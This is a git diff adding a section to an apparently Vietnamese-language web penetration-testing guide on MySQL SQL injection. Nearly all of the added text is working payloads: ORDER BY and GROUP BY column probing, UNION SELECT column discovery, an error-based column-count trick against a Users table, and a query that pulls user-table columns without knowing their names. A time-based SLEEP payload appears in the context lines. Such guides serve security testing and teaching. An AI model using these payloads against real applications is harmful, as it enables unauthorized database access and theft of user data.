--- a/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
+++ b/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
@@ -58,4 +58,52 @@ SELECT IF(
     SLEEP(10), --  10 giây nếu bảng tồn tại
     'a' -- Nếu không, trả về 'a'
 ) AS result;
+```
 
+# MYSQL Union Based 
+
+**Dò số cột**
+
+- Sử dụng `order by` hoặc `group by`
+
+```sql
+1' ORDER BY 1--+	#True
+1' ORDER BY 2--+	#True
+1' ORDER BY 3--+	#True
+1' ORDER BY 4--+	#False - Query is only using 3 columns
+                        #-1' UNION SELECT 1,2,3--+	True
+```
+
+hoặc
+
+```sql
+1' GROUP BY 1--+	#True
+1' GROUP BY 2--+	#True
+1' GROUP BY 3--+	#True
+1' GROUP BY 4--+	#False - Query is only using 3 columns
+                        #-1' UNION SELECT 1,2,3--+	True
+```
+
+- Sử dụng `UNION SELECT`
+
+```sql
+1' UNION SELECT @--+        #The used SELECT statements have a different number of columns
+1' UNION SELECT @,@--+      #The used SELECT statements have a different number of columns
+1' UNION SELECT @,@,@--+    #No error means query uses 3 column
+                            #-1' UNION SELECT 1,2,3--+	True
+```
+
+- Sử dụng `SELECT * FROM SOME_EXISTING_TABLE` ( phần này hoạt động nếu tính năng hiển thị lỗi được bật )
+
+```sql
+1' AND (SELECT * FROM Users) = 1--+ 	#Operand should contain 3 column(s)
+                                        # This error means query uses 3 column
+                                        #-1' UNION SELECT 1,2,3--+	True
+```
+
+- Trích xuất dữ liệu mà không cần biết tên cột
+
+```
+select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
+-- dbname ở đây chỉ là đặt tên cho kết quả truy 
+```
